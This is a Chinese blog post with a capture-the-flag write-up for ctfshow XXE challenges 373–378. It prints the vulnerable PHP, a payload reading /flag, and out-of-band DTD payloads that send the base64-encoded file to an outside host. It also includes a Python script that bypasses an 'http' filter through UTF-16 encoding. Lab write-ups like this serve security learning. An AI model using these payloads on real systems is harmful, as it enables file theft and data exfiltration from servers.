CTFSHPW-XXE

最新推荐文章于 2024-08-14 22:26:03 发布
最新推荐文章于 2024-08-14 22:26:03 发布
阅读量896 收藏 22
点赞数 18
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/byname1/article/details/136635921
版权

参考好文:

一篇文章带你深入理解漏洞之 XXE 漏洞 - 先知社区 (aliyun.com)

一篇很清晰深入的好文

373.有回显XXE

<?php
​
error_reporting(0);
libxml_disable_entity_loader(false); #这里的意思是允许加载外部实体功能
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);    
​
?>

post传入

<?xml version="1.0"?>
<!DOCTYPE byname[
<!ELEMENT byname ANY>
<!ENTITY xxe SYSTEM "file:///flag">   #flag就在flag文件里面
]>
​
<byname>
<payload>
&xxe;
</payload>
</byname>

hackbar发不了包,抓包了再把整个XML写进去。

374-376.无回显XXE

​
error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    
​

这里很明显没有回显了,少了echo。

那么考虑外带,那篇文章也讲的很完善了,先在VPS上搭建xxe.txt

写入

<!ENTITY % dtd "<!ENTITY &#x25; send SYSTEM 'http://byname6.com/fk/1.php?1=%file;'> ">
%dtd;%send;

这是写入的XML语句

<!DOCTYPE byname[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY  % action SYSTEM "http://byname6.com/fk/xxe.txt">
​
    %action;
]>

注意,读文件不能用file协议了,用了file协议导致卡了很久。

377.过滤http

第一个想到的是ftp协议可否行,理论上是行的,但是我的VPS没弄ftp服务这些,等我之后重置服务器了再弄。

第二种方法是利用编码绕过。

一个xml文档不仅可以用UTF-8编码,也可以用UTF-16(两个变体 - BE和LE)、UTF-32(四个变体 - BE、LE、2143、3412)和EBCDIC编码。

方便点我们就写个post请求脚本即可:

import requests
url="http://c5f075b1-f4ce-4b4b-83e4-75375a5042fb.challenge.ctf.show/"
payload="""<!DOCTYPE byname[
    <!ENTITY  % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
    <!ENTITY  % action SYSTEM "http://byname6.com/fk/xxe.txt">
​
    %action;
]> """.encode('utf-16')
requests.post(url=url,data=payload)

378.

F12能看到源码,主要是靠返回报错信息得到flag

发包后拿到flag。

byname1
关注
  • 18
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞分析 在 Web 应用程序安全测试中,XXE(XML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 ...
java8看不到源码-Apache-OFBiz-XXE:ApacheOFBiz<16.11.04的XXE注入(文件泄露)漏洞利用
06-04
XXE Apache OFBiz < 16.11.04 的 XXE 注入(文件泄露)漏洞利用 信息 16.11.04 版本之前的 Apache OFBiz 包含两个不同的 XXE 注入漏洞。 每个漏洞的公开披露可以在下面找到: [1] [2] 此漏洞利用针对链接 1 中...
Pikachu--XXE漏洞
weixin_53736204的博客
07-25 1031
XML文档结构由XML声明,DTD(文档类型定义),文档元素三部分构成!--定义此文档是 note 类型的文档-->!ELEMENT--定义note元素有四个元素-->--定义to元素为"#PCDATA”类型-->!ELEMENT!ELEMENT--定义from元素为"#PCDATA”类型-->!ELEMENT--定义head元素为"#PCDATA"类型-->!ELEMENT--定义body元素为"#PCDATA"类型--></</</</</》》》XML特性《《《
Vulnhub--XXE漏洞复现
qq_62169455的博客
08-23 348
下载完后,选择OVF文件,打开方式选择VMware,存储位置看你自己,然后打开靶机需要我们去登录,这里是没有现成的信息可以让我们登录(Vulnhub的靶场就是比较贴近于实战的环境,这里登录进去就可以直接看到flag,所以它不会直接给我们登录信息),于是就需要通过其他一些渗透手段来获取登录信息。
vulnhub-XXE ctf安全真题
weixin_61951055的博客
07-28 995
vulnhub-XXE ctf安全真题
VulnHub-XXE
热门推荐
江左盟的博客
11-28 1万+
简介 本以为该靶机是利用XXE获取权限,做的过程中才发现该靶机不已拿权限为目的,该靶机为CTF题,目的在于学习XXE漏洞。 靶机下载地址:https://www.vulnhub.com/entry/xxe-lab-1,254/ 信息收集 使用nmap --min-rate 10000 192.168.142.136 --script=vuln -sV扫描目标主机发现开启80和5355端口,80端口中间件为Apache 2.4.27,存在robots.txt文件,如图: 访问80端口为Apache默认页面,
CTF-Vulnhub-XXE安全真题复现-检测,利用,拓展,实战
白帽子九一
01-07 787
靶场网址:https://www.vulnhub.com/?q=xxe 靶场环境下载:https://download.vulnhub.com/xxe/XXE.zip 1.利用nmap扫出目标靶机ip等信息 靶场环境下载、解压并安装后,并不知道靶机的账号和密码信息,因为和kali主机是在同一网段,那么可以考虑用nmap知道靶机的ip和其他信息,结果如下: 2.提取关键信息并利用 直接访问网页xxe目录(有登录信息) 随便输账号密码bp抓包 可知为xml数据格式,接下来对它进行攻击 读取xxe.p
solr XML外部实体注入(CVE-2017-12629-xxe)
hackzkaq的博客
12-22 155
一、漏洞编号二、影响范围三、漏洞描述四、环境搭建1、进入CVE-2017-12629环境2、启动CVE-2017-12629环境3、查看CVE-2017-12629环境4、访问CVE-2017-12629环境5、查看CVE-2017-12629漏洞提示信息6、关闭CVE-2017-12629环境五、漏洞复现1、查看core2、Dnslog检测漏洞是否存在1.获取域名2.构造payload并执行3.漏洞存在3、读取/etc/passwd文件1.构造xml文件。
webgoat- XML External Entity-XXE-XML实体注入
seanyang_的博客
11-01 959
XML 外部实体攻击是针对解析 XML 输入的应用程序的一种攻击。当包含对外部实体的引用的 XML 输入由配置较弱的 XML 解析器处理时,就会发生此攻击。这种攻击可能会导致机密数据泄露、拒绝服务、服务器端请求伪造、从解析器所在机器的角度进行端口扫描以及其他系统影响。攻击可能包括使用 file: 方案或系统标识符中的相对路径来泄露本地文件,其中可能包含密码或私人用户数据等敏感数据。
vulnhub-XXE漏洞靶机流程(图文+工具包)
qq_45514735的博客
03-05 5859
靶机下载链接 http://download.vulnhub.com/xxe/XXE.zip win下全套工具包 链接:https://pan.baidu.com/s/1joOWbE6823GuFyBm92sR0A 提取码:r0xn 一、首先打开靶机 靶机是不给你账号密码的,为了防止你直接混入系统查找flag,通常密码都会先设置的非常复杂,不要想着破解了。 二、打开nmap对内网进行一次扫描找到靶机 在虚拟机里找到你的内网ip池以及掩码 填入nmap,配置选择Qui......
vulnhub-XXE靶机渗透
weixin_41082546的博客
08-24 851
下载链接:https://download.vulnhub.com/xxe/XXE.zip 0x01 确定目标IP 目标网络模式默认为net模式,无需修改 使用arp-scan或者netdiscover确定目标ip arp-scan -l 或者 netdiscover -i eth1 目标ip为 192.168.88.128 探测端口,发现目标机器只开启了80端口 访问w...
SAML-XXE-Test:专为SAML接口生成的简单XXE测试套件
05-18
SAML-XXE-测试 一个专门为SAML接口生成的简单XXE测试套件。 介绍 是一种基于XML的标记语言,SAML端点使用的XML解析器可能容易受到。 SAML消息通常使用Base64Url()编码进行传输,并且可能会另外放气(取决于所使用的...
第39天:WEB漏洞-XXE&XML之利用检测绕过全解1
08-03
XXE漏洞详解】 XML(eXtensible Markup Language)是一种用于存储和传输数据的语言,它的设计目标是为了传输和存储结构化数据,而非像HTML那样主要用于展示数据的外观。XML文档通常包含XML声明、DTD(Document ...
信息安全_数据安全_AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE.pdf
08-21
信息安全_数据安全_AppSecEU2016-Christopher-Spaeth-From-DTD-to-XXE 水坑攻击 金融安全 硬件攻防 可信编译 网络犯罪
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 640
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
安全工具推荐-Search_Viewer资产测绘】
最新发布
qq_55213436的博客
08-14 133
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
Animetronic - hackmyvm
tanbinn的博客
08-12 444
hackmyvm的Animetronic靶场
网络协议八 网络安全相关
hunandede的博客
08-12 383
ARP欺骗的防护原理。
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值